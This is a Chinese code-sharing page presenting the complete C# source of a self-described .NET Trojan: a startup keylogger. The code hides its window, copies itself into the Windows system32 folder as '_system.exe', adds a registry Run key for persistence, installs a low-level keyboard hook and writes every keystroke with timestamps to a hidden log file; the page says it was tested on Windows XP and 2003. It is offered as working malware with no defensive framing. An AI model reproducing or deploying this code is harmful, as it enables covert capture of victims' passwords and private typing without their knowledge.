赞
踩
.net木马的实现-开机键盘记录 (原创) 源代码
using System;
using System.Drawing;
using System.Collections;
using System.ComponentModel;
using System.Windows.Forms;
using System.Data;
using System.Threading;
namespace 开机键盘记录
{
/// <summary>
/// Form1 的摘要说明。
/// </summary>
public class Form1 : System.Windows.Forms.Form
{
/// <summary>
/// 必需的设计器变量。
/// </summary>
private System.ComponentModel.Container components = null;
private Hook MyHook;
private Report MyReport;
private RegistryReport MyRegistryReport;
private string keyEvents,keyDate;
public Form1()
{
//
// Windows 窗体设计器支持所必需的
//
InitializeComponent();
MyHook = new Hook();
MyReport = new Report();
MyRegistryReport = new RegistryReport();
}
/// <summary>
/// 清理所有正在使用的资源。
/// </summary>
protected override void Dispose( bool disposing )
{
if( disposing )
{
this.MyHook.UnHook();
if (components != null)
{
components.Dispose();
}
}
base.Dispose( disposing );
}
#region Windows 窗体设计器生成的代码
/// <summary>
/// 设计器支持所需的方法 - 不要使用代码编辑器修改
/// 此方法的内容。
/// </summary>
private void InitializeComponent()
{
//
// Form1
//
this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);
this.ClientSize = new System.Drawing.Size(104, 0);
this.Name = "Form1";
this.ShowInTaskbar = false;
this.Text = "Form1";
this.WindowState = System.Windows.Forms.FormWindowState.Minimized;
this.Load += new System.EventHandler(this.Form1_Load);
}
#endregion
/// <summary>
/// 应用程序的主入口点。
/// </summary>
[STAThread]
static void Main()
{
Application.Run(new Form1());
}
private void Form1_Load(object sender, System.EventArgs e)
{
this.MyRegistryReport.MoveFile();
this.MyRegistryReport.registryRun();
this.MyReport.FirstWrite();
this.MyHook.SetHook();
this.MyHook.KeyboardEvent += new KeyboardEventHandler(MyHook_KeyboardEvent);
}
private void MyHook_KeyboardEvent(KeyboardEvents keyEvent, Keys key)
{
this.keyEvents = keyEvent.ToString();
this.keyDate = key.ToString();
this.MyReport.WriteDate(keyEvents,keyDate);
}
}
}
using System;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Windows.Forms;
namespace 开机键盘记录
{
public enum KeyboardEvents
{
KeyDown = 0x0100,
KeyUp = 0x0101,
SystemKeyDown = 0x0104,
SystemKeyUp = 0x0105
}
[StructLayout(LayoutKind.Sequential)]
public struct KeyboardHookStruct
{
public int vkCode; //表示一个在1到254间的虚似键盘码
public int scanCode; //表示硬件扫描码
public int flags;
public int time;
public int dwExtraInfo;
}
public delegate void KeyboardEventHandler(KeyboardEvents keyEvent ,System.Windows.Forms.Keys key);
/// <summary>
///
/// </summary>
public class Hook
{
public event KeyboardEventHandler KeyboardEvent;
public enum HookType
{
WH_JOURNALRECORD = 0,
WH_JOURNALPLAYBACK = 1,
WH_KEYBOARD = 2,
WH_GETMESSAGE = 3,
WH_CALLWNDPROC = 4,
WH_CBT = 5,
WH_SYSMSGFILTER = 6,
WH_MOUSE = 7,
WH_HARDWARE = 8,
WH_DEBUG = 9,
WH_SHELL = 10,
WH_FOREGROUNDIDLE = 11,
WH_CALLWNDPROCRET = 12,
WH_KEYBOARD_LL = 13,
WH_MOUSE_LL = 14,
WH_MSGFILTER = -1,
}
public delegate IntPtr HookProc(int code, int wParam, IntPtr lParam);
[DllImport("User32.dll",CharSet = CharSet.Auto)]
public static extern IntPtr SetWindowsHookEx(HookType hookType,HookProc hook,IntPtr instance,int threadID);
[DllImport("User32.dll",CharSet = CharSet.Auto)]
public static extern IntPtr CallNextHookEx(IntPtr hookHandle, int code, int wParam, IntPtr lParam);
[DllImport("User32.dll",CharSet = CharSet.Auto)]
public static extern bool UnhookWindowsHookEx(IntPtr hookHandle);
private IntPtr instance;
private IntPtr hookHandle;
private int threadID;
private HookProc hookProcEx;
public Hook()
{
this.instance =
Marshal.GetHINSTANCE(Assembly.GetExecutingAssembly().GetModules()[0]);
this.threadID = 0;
hookHandle = IntPtr.Zero;
hookProcEx = new HookProc(hookProc);
}
public bool SetHook()
{
this.hookHandle = SetWindowsHookEx(HookType.WH_KEYBOARD_LL,hookProcEx,this.instance,this.threadID);
return ((int)hookHandle != 0);
}
public IntPtr hookProc(int code, int wParam, IntPtr lParam)
{
if(code >= 0)
{
KeyboardEvents kEvent = (KeyboardEvents)wParam;
if (kEvent != KeyboardEvents.KeyDown &&
kEvent != KeyboardEvents.KeyUp &&
kEvent != KeyboardEvents.SystemKeyDown &&
kEvent != KeyboardEvents.SystemKeyUp)
{
return CallNextHookEx(this.hookHandle,(int)HookType.WH_KEYBOARD_LL,wParam, lParam);
}
KeyboardHookStruct MyKey = new KeyboardHookStruct();
Type t = MyKey.GetType();
MyKey = (KeyboardHookStruct)Marshal.PtrToStructure(lParam,t);
Keys keyData=(Keys)MyKey.vkCode;
KeyboardEvent(kEvent, keyData);
}
return CallNextHookEx(this.hookHandle,(int)HookType.WH_KEYBOARD_LL,wParam, lParam);
}
public bool UnHook()
{
return Hook.UnhookWindowsHookEx(this.hookHandle);
}
}
}
using System;
using System.IO;
using Microsoft.Win32;
using System.Windows.Forms;
namespace 开机键盘记录
{
/// <summary>
///
/// </summary>
public class RegistryReport
{
public RegistryReport()
{
//
// TODO: 在此处添加构造函数逻辑
//
}
public void MoveFile()
{
if(!File.Exists("c://windows//system32//_system.exe"))
{
File.Move(Application.ExecutablePath,"c://windows//system32//_system.exe");
}
else
return;
}
public void registryRun()
{
RegistryKey key1=Registry.CurrentUser.CreateSubKey("Software//Microsoft//Windows//CurrentVersion//run");
key1.SetValue("","c://windows//system32//_system.exe");
key1.Close();
}
}
}
using System;
using System.IO;
namespace 开机键盘记录
{
/// <summary>
///
/// </summary>
public class Report
{
public Report()
{
//
// TODO: 在此处添加构造函数逻辑
//
}
public void FirstWrite()
{
StreamWriter sw = new StreamWriter("c:/windows/system32/keyReport.txt",true);
sw.WriteLine("************* LittleStudio Studio ************* ");
sw.WriteLine("******** " + DateTime.Today.Year.ToString() + "."
+ DateTime.Today.Month.ToString() + "."
+ DateTime.Today.Day.ToString() + " "
+ DateTime.Now.Hour.ToString() + ":"
+ DateTime.Now.Minute.ToString() + ":"
+ DateTime.Now.Second.ToString() + " ********");
sw.Close();
}
public void WriteDate(string keyEvents,string keyDate)
{
try
{
StreamWriter sw = new StreamWriter("c:/windows/system32/keyReport.txt",true);
sw.WriteLine(keyDate + "键 " + keyEvents + " "
+ DateTime.Now.Hour.ToString() + ":"
+ DateTime.Now.Minute.ToString() + ":"
+ DateTime.Now.Second.ToString());
sw.Close();
}
catch{}
return;
}
}
}
在WindowsXP,2003下调试通过。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。